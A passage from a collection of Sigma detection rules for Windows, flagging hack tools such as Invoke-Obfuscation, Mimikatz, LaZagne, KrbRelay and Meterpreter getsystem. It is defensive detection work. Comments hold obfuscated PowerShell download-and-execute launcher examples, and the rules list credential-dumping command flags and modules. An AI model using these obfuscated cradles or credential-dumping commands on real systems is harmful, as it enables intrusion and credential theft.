    "content": "title: Invoke-Obfuscation Via Use Clip\nid: e1561947-b4e3-4a74-9bdd-83baed21bdb5\nstatus: test\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2024-04-15\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example 1: C:\\WINdoWS\\sySteM32\\CMd /c \" ECho\\Invoke-Expression (New-Object Net.WebClient).DownloadString|Clip.Exe&&C:\\WINdoWS\\sySteM32\\CMd /c pOWerSheLl -STa . ( \\\"{2}{0}{1}\\\"-f'dd-',(\\\"{0}{1}\\\" -f 'T','ype' ),'A' ) -Assembly ( \\\"{4}{1}{3}{0}{2}\\\"-f (\\\"{0}{1}\\\" -f 'nd','ow'),( \\\"{1}{0}\\\"-f'.W','stem' ),( \\\"{2}{1}{0}\\\" -f 'rms','Fo','s.'),'i','Sy') ; ${exeCUtIOnCONTeXT}.\\\"INV`oKECOM`m`ANd\\\".\\\"INV`ok`ESCriPT\\\"( ( [sYSteM.wiNDoWS.forMs.ClIPboaRD]::( \\\"{2}{0}{1}\\\" -f'Ex','t',(\\\"{0}{1}\\\" -f'Get','t' ) ).\\\"iNvo`Ke\\\"( )) ) ; [System.Windows.Forms.Clipboard]::(\\\"{1}{0}\\\" -f 'ar','Cle' ).\\\"in`V`oKE\\\"( )\"\n        # Example 2: C:\\WINDowS\\sYsTEM32\\CmD.eXE /C\" echo\\Invoke-Expression (New-Object Net.WebClient).DownloadString| C:\\WIndOWs\\SYSteM32\\CLip &&C:\\WINDowS\\sYsTEM32\\CmD.eXE /C POWERSHeLL -sT -noL [Void][System.Reflection.Assembly]::( \\\"{0}{3}{4}{1}{2}\\\" -f( \\\"{0}{1}\\\"-f'Lo','adW' ),( \\\"{0}{1}\\\"-f 'Par','t'),( \\\"{0}{1}{2}\\\"-f 'ial','N','ame'),'it','h' ).\\\"in`VO`KE\\\"( ( \\\"{3}{1}{4}{5}{2}{0}\\\"-f'rms','ystem.Windo','Fo','S','w','s.' )) ; ( [wIndows.fOrms.cLIPBOArD]::( \\\"{1}{0}\\\"-f'T',( \\\"{1}{0}\\\" -f'tEX','gET' )).\\\"i`Nvoke\\\"( ) ) ^^^| ^^^& ( ( ^^^& ( \\\"{2}{1}{0}\\\"-f 'e',( \\\"{2}{1}{0}\\\"-f'IABl','aR','v' ),( \\\"{0}{1}\\\"-f'Get','-' ) ) ( \\\"{1}{0}\\\"-f'*','*MDr' )).\\\"n`Ame\\\"[3,11,2]-jOin'') ; [Windows.Forms.Clipboard]::( \\\"{0}{1}\\\" -f (\\\"{1}{0}\\\"-f'tT','Se' ),'ext').\\\"in`VoKe\\\"(' ' )\"\n        CommandLine|re: '(?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA\nid: ac20ae82-8758-4f38-958e-b44a3140ca88\nstatus: test\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009   # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-08\nmodified: 2022-03-08\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION\nid: e9f55347-2928-4c06-88e5-1a7f8169942e\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-16\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # CommandLine|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n        # Example 1: CMD /C\"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\\wINDowS\\sYsWow64\\winDOWspoWERSheLl\\V1.0\\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\\\"invo`kEcoMm`A`ND\\\".( \\\"{2}{1}{0}\\\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \\\"{0}{1}\\\" -f'D','IR' ) ( \\\"{0}{1}\\\"-f'ENV:kU','R')).\\\"vAl`Ue\\\" )&& CMD /C%mXI%\"\n        # Example 2: c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C \"sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\\\"{2}{0}{1}\\\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \\\"{2}{3}{0}{1}\\\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \\\"{2}{5}{0}{1}{6}{4}{3}\\\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \\\"{0}{1}\\\"-f'd','ejLz' ),( \\\"{1}{2}{0}\\\"-f'cEss','P','RO') )) )&& c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C %ybkm%\"\n        CommandLine|contains|all:\n            - '&&set'\n            - 'cmd'\n            - '/c'\n            - '-f'\n        CommandLine|contains:\n            - '{0}'\n            - '{1}'\n            - '{2}'\n            - '{3}'\n            - '{4}'\n            - '{5}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml",
    "content": "title: HackTool - Jlaive In-Memory Assembly Execution\nid: 0a99eb3e-1617-41bd-b095-13dc767f3def\nstatus: test\ndescription: Detects the use of Jlaive to execute assemblies in a copied PowerShell\nreferences:\n    - https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool\n    - https://web.archive.org/web/20220514073704/https://github.com/ch2sh/Jlaive\nauthor: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)\ndate: 2022-05-24\nmodified: 2023-02-22\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    parent_selection:\n        ParentImage|endswith: '\\cmd.exe'\n        ParentCommandLine|endswith: '.bat'\n    selection1:\n        Image|endswith: '\\xcopy.exe'\n        CommandLine|contains|all:\n            - 'powershell.exe'\n            - '.bat.exe'\n    selection2:\n        Image|endswith: '\\xcopy.exe'\n        CommandLine|contains|all:\n            - 'pwsh.exe'\n            - '.bat.exe'\n    selection3:\n        Image|endswith: '\\attrib.exe'\n        CommandLine|contains|all:\n            - '+s'\n            - '+h'\n            - '.bat.exe'\n    condition: parent_selection and (1 of selection*)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_koadic.yml",
    "content": "title: HackTool - Koadic Execution\nid: 5cddf373-ef00-4112-ad72-960ac29bac34\nstatus: test\ndescription: Detects command line parameters used by Koadic hack tool\nreferences:\n    - https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/\n    - https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js\n    - https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/\nauthor: wagga, Jonhnathan Ribeiro, oscd.community\ndate: 2020-01-12\nmodified: 2023-02-11\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmd.exe'\n        - OriginalFileName: 'Cmd.Exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/q'\n            - '/c'\n            - 'chcp'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml",
    "content": "title: HackTool - KrbRelay Execution\nid: e96253b8-6b3b-4f90-9e59-3b24b99cf9b4\nstatus: test\ndescription: Detects the use of KrbRelay, a Kerberos relaying tool\nreferences:\n    - https://github.com/cube0x0/KrbRelay\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-27\nmodified: 2023-02-04\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\KrbRelay.exe'\n        - OriginalFileName: 'KrbRelay.exe' # In case the file has been renamed after compilation\n    selection_cli_1:\n        CommandLine|contains|all:\n            - ' -spn '\n            - ' -clsid '\n            - ' -rbcd '\n    selection_cli_2:\n        CommandLine|contains|all:\n            - 'shadowcred'\n            - 'clsid'\n            - 'spn'\n    selection_cli_3:\n        CommandLine|contains|all:\n            - 'spn '\n            - 'session '\n            - 'clsid '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelay_remote.yml",
    "content": "title: HackTool - RemoteKrbRelay Execution\nid: a7664b14-75fb-4a50-a223-cb9bc0afbacf\nstatus: test\ndescription: |\n    Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.\nreferences:\n    - https://github.com/CICADA8-Research/RemoteKrbRelay\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1558.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\RemoteKrbRelay.exe'\n        - OriginalFileName: 'RemoteKrbRelay.exe'\n    selection_cli_required:\n        CommandLine|contains|all:\n            - ' -clsid '\n            - ' -target '\n            - ' -victim '\n    # selection_cli_attacks:\n    #     # Note: In the current implementation these flags do not require any other flags. Which means they can't be used on their own. They're already covered by \"selection_cli_required\"\n    #     CommandLine|contains:\n    #         - '-adcs ' # relay to HTTP Web Enrollment and get certificate\n    #         - '-laps ' # relay to LDAP and extract LAPS passwords\n    #         - '-ldapwhoami ' # relay to LDAP and get info about relayed user\n    #         - '-shadowcred ' # relay to LDAP and setup Shadow Credentials\n    selection_cli_attack_smb:\n        CommandLine|contains|all:\n            - '-smb ' # relay to SMB\n            - '--smbkeyword '\n        CommandLine|contains:\n            - 'interactive'\n            - 'secrets'\n            - 'service-add'\n    selection_cli_attack_rbcd_main:\n        CommandLine|contains: '-rbcd ' # relay to LDAP and setup RBCD\n    selection_cli_attack_rbcd_options:\n        CommandLine|contains:\n            - '-cn ' # Computer name that will be written to msDs-AllowedToActOnBehalfOfOtherIdentity\n            - '--computername ' # Computer name that will be written to msDs-AllowedToActOnBehalfOfOtherIdentity\n    selection_cli_attack_changepass:\n        CommandLine|contains: '-chp ' # relay to LDAP and change user password\n        CommandLine|contains|all:\n            - '-chpPass ' # new password\n            - '-chpUser ' # the name of the user whose password you want to change\n    selection_cli_attack_addgrpname:\n        CommandLine|contains|all:\n            - '-addgroupmember ' # relay to LDAP and add user to group\n            - '-group '\n            - '-groupuser '\n    condition: selection_img or selection_cli_required or all of selection_cli_attack_rbcd_* or selection_cli_attack_changepass or selection_cli_attack_addgrpname or selection_cli_attack_smb\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_krbrelayup.yml",
    "content": "title: HackTool - KrbRelayUp Execution\nid: 12827a56-61a4-476a-a9cb-f3068f191073\nstatus: test\ndescription: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced\nreferences:\n    - https://github.com/Dec0ne/KrbRelayUp\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-26\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1558.003\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\KrbRelayUp.exe'\n        - OriginalFileName: 'KrbRelayUp.exe' # In case the file has been renamed after compilation\n    selection_cli_1:\n        CommandLine|contains|all:\n            - ' relay '\n            - ' -Domain '\n            - ' -ComputerName '\n    selection_cli_2:\n        CommandLine|contains|all:\n            - ' krbscm '\n            - ' -sc '\n    selection_cli_3:\n        CommandLine|contains|all:\n            - ' spawn '\n            - ' -d '\n            - ' -cn '\n            - ' -cp '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_lazagne.yml",
    "content": "title: HackTool - LaZagne Execution\nid: c2b86e67-b880-4eec-b045-50bc98ef4844\nstatus: experimental\ndescription: |\n    Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer.\n    LaZagne has been leveraged multiple times by threat actors in order to dump credentials.\nreferences:\n    - https://github.com/AlessandroZ/LaZagne/tree/master\n    - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\n    - https://cloud.google.com/blog/topics/threat-intelligence/alphv-ransomware-backup/\n    - https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\n    - https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/raw/800c0e06571993a54e39571cf27fd474dcc5c0bc/2017/2017.11.14.Muddying_the_Water/muddying-the-water-targeted-attacks.pdf\nauthor: Nasreddine Bencherchali, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2024-06-24\nmodified: 2025-10-07\ntags:\n    - attack.credential-access\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img_metadata:\n        Image|endswith: '\\lazagne.exe'\n    selection_img_cli:\n        # Note: This selection can be prone to FP. An initial baseline is required\n        Image|contains:\n            - ':\\PerfLogs\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Tmp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\$Recycle.bin'\n            - '\\AppData\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Favorites\\'\n            - '\\Links\\'\n            - '\\Music\\'\n            - '\\Photos\\'\n            - '\\Pictures\\'\n            - '\\Saved Games\\'\n            - '\\Searches\\'\n            - '\\Users\\Contacts\\'\n            - '\\Users\\Default\\'\n            - '\\Users\\Searches\\'\n            - '\\Videos\\'\n            - '\\Windows\\addins\\'\n            - '\\Windows\\Fonts\\'\n            - '\\Windows\\IME\\'\n        CommandLine|endswith:\n            - '.exe all'\n            - '.exe browsers'\n            - '.exe chats'\n            - '.exe databases'\n            - '.exe games'\n            - '.exe git'\n            - '.exe mails'\n            - '.exe maven'\n            - '.exe memory'\n            - '.exe multimedia'\n            # - '.exe php' # Might be prone to FP\n            # - '.exe svn' # Might be prone to FP\n            - '.exe sysadmin'\n            - '.exe unused'\n            - '.exe wifi'\n            - '.exe windows'\n    selection_cli_modules:\n        CommandLine|contains:\n            - ' all '\n            - ' browsers '\n            - ' chats '\n            - ' databases '\n            - ' games '\n            - ' mails '\n            - ' maven '\n            - ' memory '\n            - ' multimedia '\n            - ' php '\n            - ' svn '\n            - ' sysadmin '\n            - ' unused '\n            - ' wifi '\n    selection_cli_options:\n        CommandLine|contains:\n            - '-1Password'\n            - '-apachedirectorystudio'\n            - '-autologon'\n            - '-ChromiumBased'\n            - '-coreftp'\n            - '-credfiles'\n            - '-credman'\n            - '-cyberduck'\n            - '-dbvis'\n            - '-EyeCon'\n            - '-filezilla'\n            - '-filezillaserver'\n            - '-ftpnavigator'\n            - '-galconfusion'\n            - '-gitforwindows'\n            - '-hashdump'\n            - '-iisapppool'\n            - '-IISCentralCertP'\n            - '-kalypsomedia'\n            - '-keepass'\n            - '-keepassconfig'\n            - '-lsa_secrets'\n            - '-mavenrepositories'\n            - '-memory_dump'\n            - '-Mozilla'\n            - '-mRemoteNG'\n            - '-mscache'\n            - '-opensshforwindows'\n            - '-openvpn'\n            - '-outlook'\n            - '-pidgin'\n            - '-postgresql'\n            - '-psi-im'\n            - '-puttycm'\n            - '-pypykatz'\n            - '-Rclone'\n            - '-rdpmanager'\n            - '-robomongo'\n            - '-roguestale'\n            - '-skype'\n            - '-SQLDeveloper'\n            - '-squirrel'\n            - '-tortoise'\n            - '-turba'\n            - '-UCBrowser'\n            - '-unattended'\n            - '-vault'\n            - '-vaultfiles'\n            - '-vnc'\n            - '-winscp'\n    condition: 1 of selection_img_* or all of selection_cli_*\nfalsepositives:\n    - Some false positive is expected from tools with similar command line flags.\n# Note: Increase the level to \"high\" after an initial baseline\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml",
    "content": "title: HackTool - LocalPotato Execution\nid: 6bd75993-9888-4f91-9404-e1e4e4e34b77\nstatus: test\ndescription: Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples\nreferences:\n    - https://www.localpotato.com/localpotato_html/LocalPotato.html\n    - https://github.com/decoder-it/LocalPotato\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-14\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - cve.2023-21746\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\LocalPotato.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - '.exe -i C:\\'\n            - '-o Windows\\'\n    selection_hash_plain:\n        Hashes|contains:\n            - 'IMPHASH=E1742EE971D6549E8D4D81115F88F1FC'\n            - 'IMPHASH=DD82066EFBA94D7556EF582F247C8BB5'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml",
    "content": "title: Potential Meterpreter/CobaltStrike Activity\nid: 15619216-e993-4721-b590-4c520615a67d\nstatus: test\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth\ndate: 2019-10-26\nmodified: 2023-02-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        ParentImage|endswith: '\\services.exe'\n    selection_technique_1:\n        # Examples:\n        #   Meterpreter  getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        #   CobaltStrike getsystem technique 1b (expanded env var): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        #   CobaltStrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        CommandLine|contains|all:\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        CommandLine|contains:\n            - 'cmd'\n            - '%COMSPEC%'\n    selection_technique_2:\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        CommandLine|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    filter_defender:\n        CommandLine|contains: 'MpCmdRun'\n    condition: selection_img and 1 of selection_technique_* and not 1 of filter_*\nfalsepositives:\n    - Commandlines containing components like cmd accidentally\n    - Jobs and services started with cmd\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml",
    "content": "title: HackTool - Mimikatz Execution\nid: a642964e-bead-4bed-8910-1bb4d63e3b4d\nstatus: test\ndescription: Detection well-known mimikatz command line arguments\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://tools.thehacker.recipes/mimikatz/modules\nauthor: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton\ndate: 2019-10-22\nmodified: 2023-02-21\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools_name:\n        CommandLine|contains:\n            - 'DumpCreds'\n            - 'mimikatz'\n    selection_function_names: # To cover functions from modules that are not in module_names\n        CommandLine|contains:\n            - '::aadcookie' # misc module\n            - '::detours' # misc module\n            - '::memssp' # misc module\n            - '::mflt' # misc module\n            - '::ncroutemon' # misc module\n            - '::ngcsign' # misc module\n            - '::printnightmare' # misc module\n            - '::skeleton' # misc module\n            - '::preshutdown'  # service module\n            - '::mstsc'  # ts module\n            - '::multirdp'  # ts module\n    selection_module_names:\n        CommandLine|contains:\n            - 'rpc::'\n            - 'token::'\n            - 'crypto::'\n            - 'dpapi::'\n            - 'sekurlsa::'\n            - 'kerberos::'\n            - 'lsadump::'\n            - 'privilege::'\n            - 'process::'\n            - 'vault::'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml",
    "content": "title: HackTool - PCHunter Execution\nid: fca949cc-79ca-446e-8064-01aa7e52ece5\nstatus: test\ndescription: Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff\nreferences:\n    - https://web.archive.org/web/20231210115125/http://www.xuetr.com/\n    - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/\n    - https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali\ndate: 2022-10-10\nmodified: 2024-11-23\ntags:\n    - attack.execution\n    - attack.discovery\n    - attack.t1082\n    - attack.t1057\n    - attack.t1012\n    - attack.t1083\n    - attack.t1007\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_image:\n        Image|endswith:\n            - '\\PCHunter64.exe'\n            - '\\PCHunter32.exe'\n    selection_pe:\n        - OriginalFileName: 'PCHunter.exe'\n        - Description: 'Epoolsoft Windows Information View Tools'\n    selection_hashes:\n        Hashes|contains:\n            - 'SHA1=5F1CBC3D99558307BC1250D084FA968521482025'\n            - 'MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7'\n            - 'SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32'\n            - 'IMPHASH=444D210CEA1FF8112F256A4997EED7FF'\n            - 'SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB'\n            - 'MD5=228DD0C2E6287547E26FFBD973A40F14'\n            - 'SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C'\n            - 'IMPHASH=0479F44DF47CFA2EF1CCC4416A538663'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml",
    "content": "title: HackTool - Default PowerSploit/Empire Scheduled Task Creation\nid: 56c217c3-2de2-479b-990f-5c109ba8458f\nstatus: test\ndescription: Detects the creation of a schtask via PowerSploit or Empire Default Configuration.\nreferences:\n    - https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1\n    - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py\nauthor: Markus Neis, @Karneades\ndate: 2018-03-06\nmodified: 2023-03-03\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.s0111\n    - attack.g0022\n    - attack.g0060\n    - car.2013-08-001\n    - attack.t1053.005\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - '/Create'\n            - 'powershell.exe -NonI'\n            - '/TN Updater /TR'\n        CommandLine|contains:\n            - '/SC ONLOGON'\n            - '/SC DAILY /ST'\n            - '/SC ONIDLE'\n            - '/SC HOURLY'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_powertool.yml",
    "content": "title: HackTool - PowerTool Execution\nid: a34f79a3-8e5f-4cc3-b765-de00695452c2\nstatus: test\ndescription: Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files\nreferences:\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\n    - https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html\n    - https://twitter.com/gbti_sa/status/1249653895900602375?lang=en\n    - https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-29\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\PowerTool.exe'\n              - '\\PowerTool64.exe'\n        - OriginalFileName: 'PowerTool.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml",
    "content": "title: HackTool - PurpleSharp Execution\nid: ff23ffbc-3378-435e-992f-0624dcf93ab4\nstatus: test\ndescription: Detects the execution of the PurpleSharp adversary simulation tool\nreferences:\n    - https://github.com/mvelazc0/PurpleSharp\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-06-18\nmodified: 2023-02-05\ntags:\n    - attack.t1587\n    - attack.resource-development\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\purplesharp'\n        - OriginalFileName: 'PurpleSharp.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'xyz123456.exe'\n            - 'PurpleSharp'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_pypykatz.yml",
    "content": "title: HackTool - Pypykatz Credentials Dumping Activity\nid: a29808fd-ef50-49ff-9c7a-59a9b040b404\nstatus: test\ndescription: Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored\nreferences:\n    - https://github.com/skelsec/pypykatz\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-2---registry-parse-with-pypykatz\nauthor: frack113\ndate: 2022-01-05\nmodified: 2023-02-05\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - \\pypykatz.exe\n            - \\python.exe\n        CommandLine|contains|all:\n            - 'live'\n            - 'registry'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml",
    "content": "title: HackTool - Quarks PwDump Execution\nid: 0685b176-c816-4837-8e7b-1216f346636b\nstatus: test\ndescription: Detects usage of the Quarks PwDump tool via commandline arguments\nreferences:\n    - https://github.com/quarkslab/quarkspwdump\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-05\nmodified: 2023-02-05\ntags:\n    - attack.credential-access\n    - attack.t1003.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\QuarksPwDump.exe'\n    selection_cli:\n        CommandLine:\n            - ' -dhl'\n            - ' --dump-hash-local'\n            - ' -dhdc'\n            - ' --dump-hash-domain-cached'\n            - ' --dump-bitlocker'\n            - ' -dhd '\n            - ' --dump-hash-domain '\n            - '--ntds-file'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml",
